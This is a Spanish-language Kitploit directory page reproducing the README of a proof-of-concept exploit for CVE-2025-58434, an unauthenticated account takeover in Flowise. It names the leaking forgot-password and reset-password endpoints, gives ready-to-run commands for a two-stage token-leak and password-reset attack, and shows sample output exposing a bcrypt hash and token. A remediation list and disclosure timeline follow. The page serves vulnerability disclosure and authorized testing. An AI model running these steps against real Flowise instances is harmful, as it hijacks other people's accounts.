Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-58434-poc — Exploit de prueba de concepto para CVE-2025-58434, que demuestra la toma de control de cuentas sin autenticación en Flowise mediante tokens de restablecimiento de contraseña filtrados. Incluye un ataque de dos etapas: fuga de tokens y restablecimiento de contraseña. | Kitploit
Herramientas/GitHubGitHub/kartik2005221/cve-2025-58434-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónAprendizaje y EducaciónRed Teaming
GitHubkartik2005221/cve-2025-58434-poc

CVE-2025-58434-poc

Exploit de prueba de concepto para CVE-2025-58434, que demuestra la toma de control de cuentas sin autenticación en Flowise mediante tokens de restablecimiento de contraseña filtrados. Incluye un ataque de dos etapas: fuga de tokens y restablecimiento de contraseña.

Ver Repositorio
138hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-58434 — Toma de Control de Cuenta en Flowise mediante Divulgación de Token

CVE CVSS Python License Disclosure

⚠️ Este repositorio es solo para fines educativos e investigación de seguridad autorizada.
El uso no autorizado contra sistemas que no posee o para los cuales no tiene permiso explícito es ilegal.


Tabla de Contenidos

  • Descripción General
  • Detalles de la Vulnerabilidad
  • Flujo del Ataque
  • Versiones Afectadas
  • Estructura del Repositorio
  • Requisitos
Instalación
  • Uso
  • Ejemplo de Salida
  • Remediación
  • Cronología de Divulgación
  • Referencias
  • Aviso Legal

  • Descripción General

    El endpoint forgot-password en Flowise (tanto en la versión en la nube como en la autoalojada) devuelve un token de restablecimiento de contraseña válido (tempToken) directamente en el cuerpo de la respuesta HTTP sin ninguna verificación por correo electrónico ni autenticación.

    Esto significa que un atacante que conoce (o puede adivinar) la dirección de correo electrónico de una víctima puede:

    1. Llamar al endpoint forgot-password → recibir el tempToken en la respuesta JSON
    2. Usar el tempToken para llamar a reset-password → establecer una nueva contraseña arbitraria
    3. Iniciar sesión como la víctima → toma de control total de la cuenta (ATO)

    No se requiere acceso previo, interacción del usuario ni acceso al correo electrónico.


    Detalles de la Vulnerabilidad

    CampoValor
    CVE IDCVE-2025-58434
    Puntuación CVSS9.8 (Crítico)
    Vector CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    CWECWE-640: Mecanismo Débil de Recuperación de Contraseña
    TipoBypass de Autenticación / Exposición Insegura de Objetos Directos
    App AfectadaFlowise (nube + autoalojada)
    Endpoint 1POST /api/v1/account/forgot-password
    Endpoint 2POST /api/v1/account/reset-password

    Causa Raíz

    El manejador de forgot-password devuelve el registro completo del usuario, incluido el tempToken generado, directamente en la respuesta de la API en lugar de solo enviarlo a la dirección de correo electrónico registrada del usuario.

    root@kitploit:~
    {
      "user": {
        "id": "<uuid>",
        "name": "Nombre de la Víctima",
        "email": "[email protected]",
        "credential": "<bcrypt-hash>",
        "tempToken": "<TOKEN_FILTRADO>",
        "tokenExpiry": "2025-08-19T13:00:33.834Z",
        "status": "active"
      }
    }
    

    Flujo del Ataque

    root@kitploit:~
    Atacante                              API de Flowise
       │                                       │
       │  POST /forgot-password {email}        │
       │──────────────────────────────────────►│
       │                                       │  (genera tempToken)
       │◄──────────────────────────────────────│
       │  201 { tempToken: "abc123..." }       │
       │                                       │
       │  POST /reset-password {email,         │
       │         tempToken, newPassword}       │
       │──────────────────────────────────────►│
       │                                       │
       │◄──────────────────────────────────────│
       │  200 OK  (contraseña cambiada!)       │
       │                                       │
       ✓  Toma de Control de Cuenta Completada
    

    Versiones Afectadas

    • Flowise Cloud (cloud.flowiseai.com) — confirmado afectado
    • Todas las implementaciones autoalojadas de Flowise anteriores al parche

    Consulte el repositorio oficial de Flowise en GitHub para obtener información sobre la versión parcheada.


    Estructura del Repositorio

    root@kitploit:~
    CVE-2025-58434/
    ├── cve_2025_58434_poc.py   # Script PoC principal (ATO en dos etapas)
    ├── requirements.txt         # Dependencias de Python
    ├── README.md                # Este archivo
    └── DISCLAIMER.md            # Aviso legal (léalo antes de usar)
    

    Requisitos

    • Python 3.7 o superior
    • Biblioteca requests

    Instalación

    root@kitploit:~
    # Clonar el repositorio
    git clone https://github.com/yourhandle/CVE-2025-58434
    cd CVE-2025-58434
    
    # Instalar dependencias
    pip install -r requirements.txt
    

    Uso

    Pantalla de Ayuda

    root@kitploit:~
    python3 cve_2025_58434_poc.py --help
    

    Etapa 1 — Obtener el Token (Reconocimiento)

    Confirme que la instancia es vulnerable y recupere el tempToken sin restablecer ninguna contraseña.

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.example.com \
      --email [email protected]
    

    Etapa 2 — Toma de Control Total de la Cuenta

    Use el token filtrado para restablecer la contraseña inmediatamente.

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.example.com \
      --email [email protected] \
      --reset \
      --new-password "MyNewP@ss2025!"
    

    Volcar la Respuesta JSON Cruda

    root@kitploit:~
    python3 cve_2025_58434_poc.py \
      --url https://flowise.example.com \
      --email [email protected] \
      --json-output
    

    Todas las Opciones

    FlagCortoDescripciónValor por Defecto
    --url URL-uURL base de la instancia de Flowise(requerido)
    --email EMAIL-eDirección de correo electrónico de la cuenta objetivo(requerido)
    --reset-rRealizar Etapa 2: restablecer contraseña con token filtradoFalse
    --new-password PASS-pNueva contraseña a establecer (usado con --reset)Changeme@2025!
    --timeout SECONDS-tTiempo de espera para solicitudes HTTP10
    --json-output-jImprimir respuesta JSON cruda de la API en salida estándarFalse

    Ejemplo de Salida

    root@kitploit:~
      [Paso 1] Enviando solicitud de forgot-password …
      [*] Estado HTTP : 201
    
      ========================================================================
        DATOS FILTRADOS DE LA CUENTA
      ========================================================================
        ID de Usuario : 3fa1c2d4-xxxx-xxxx-xxxx-xxxxxxxxxxxx
        Nombre        : Usuario Admin
        Correo        : [email protected]
        Credencial    : $2b$10$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
        Estado        : active
        tempToken     : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
        tokenExpiry   : 2025-08-19T13:00:33.834Z
      ========================================================================
    
      [+] tempToken obtenido  : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
      [!] VULNERABLE: ¡La instancia filtra tokens de restablecimiento de contraseña sin autenticación!
    

    Remediación

    Si es operador de una instancia de Flowise, aplique las siguientes mitigaciones de inmediato:

    1. Nunca devuelva tokens de restablecimiento en respuestas de la API. Envíe el token exclusivamente mediante la dirección de correo electrónico registrada.
    2. Devuelva un mensaje de éxito genérico desde forgot-password independientemente de si el correo existe — esto también evita la enumeración de cuentas.
    3. Imponga restricciones al token:
      • De un solo uso (invalidar después del primer uso)
      • Caducidad corta (p. ej., 15 minutos)
      • Vinculado a la IP / User-Agent solicitante cuando sea posible
    4. Aplique la corrección a todos los modelos de implementación — nube y autoalojados.
    5. Agregue limitación de tasa al endpoint forgot-password.
    6. Registre y alerte sobre actividad anormal de restablecimiento de contraseña.
    7. Considere MFA para cuentas de administrador y de altos privilegios.

    Cronología de Divulgación

    FechaEvento
    2025-08-19Vulnerabilidad descubierta y reportada
    Por definirReconocimiento del proveedor
    Por definirParche publicado
    Por definirDivulgación pública

    Referencias

    • Aviso de GitHub GHSA-wgpv-6j63-x5ph
    • NVD — CVE-2025-58434
    • Repositorio de Flowise en GitHub
    • CWE-640: Mecanismo Débil de Recuperación de Contraseña

    Aviso Legal

    Este proyecto está destinado únicamente a fines educativos y pruebas de penetración autorizadas.

    • NO ejecute esta herramienta contra ningún sistema sin permiso explícito por escrito del propietario del sistema.
    • El(los) autor(es) de este repositorio no aceptan ninguna responsabilidad por cualquier uso indebido, daño o consecuencia legal derivada del uso no autorizado.
    • Consulte DISCLAIMER.md para el aviso legal completo.
    Descargar herramienta